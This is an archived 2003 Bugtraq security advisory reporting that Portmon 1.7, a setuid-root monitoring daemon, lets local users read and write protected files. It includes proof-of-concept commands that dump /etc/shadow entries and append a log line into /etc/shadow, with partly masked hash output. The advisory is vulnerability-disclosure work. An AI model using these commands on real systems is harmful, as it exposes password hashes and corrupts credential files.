lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <OF86E8659B.D5EBC408-ON87256D48.00750612-07256D48.0077B8C2@us.ibm.com>
Date: Tue, 17 Jun 2003 14:47:40 -0700
From: David Hancock <dmhancoc@...ibm.com>
To: bugtraq@...urityfocus.com
Subject: Portmon file arbitrary read/write access vulnerability









Package:       Portmon
Auth:          http://www.aboleo.net/
Version(s):    1.7 (prior ?)
Vulnerability: File arbitrary read/write access
vulnerability

Portmon is a network service monitoring daemon
(http://www.aboleo.net/software/portmon/).
"In order to use ping support, Portmon must run as root
or be installed setuid with root permissions
due to the fact that it must open up a raw socket."
The product suffer from a security problem that allows
any local user to read/write protected files on the system.
This is dude to a hole in the way the program handles
loading of two configuration files: host file/log file.

Example (read):

[lucae@...ux lucae]$portmon -c /etc/shadow

Unable to resolve hostname
root:$1$nsqR6sX$ItXXXXXXXXXXXXXXXXX.:12172:0:99999:7:::
Unable to resolve hostname bin:*:12172:0:99999:7:::
Unable to resolve hostname daemon:*:12172:0:99999:7:::
Unable to resolve hostname adm:*:12172:0:99999:7:::
Unable to resolve hostname lp:*:12172:0:99999:7:::
Unable to resolve hostname sync:*:12172:0:99999:7:::
Unable to resolve hostname shutdown:*:12172:0:99999:7:::
Unable to resolve hostname halt:*:12172:0:99999:7:::
Unable to resolve hostname mail:*:12172:0:99999:7:::
Unable to resolve hostname news:*:12172:0:99999:7:::

<snip>



Example (write):



[lucae@...ux lucae]$portmon -l /etc/shadow
fopen: No such file or directory
Failed reading config file hosts

[root@...ux root]#cat /etc/shadow
<snip>

lucae:$1$w3IGpzV4$i8WcXXXXXXXXXXXXXXXX/:12172:0:99999:7:::
nessus:$1$XSaW3b5e$WWzXXXXXXXXXXXXXXXX.:12183:0:99999:7:::
test:$1$6r5/OoES$RX3OXXXXXXXXXXXXXXXX/:12200:0:99999:7:::
(Mon Jun 16 01:40:17 2003) - Portmon started by user
lucae       //line added

[root@...ux root]#







Luca Ercoli luca.ercoli[at]inwind.it

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ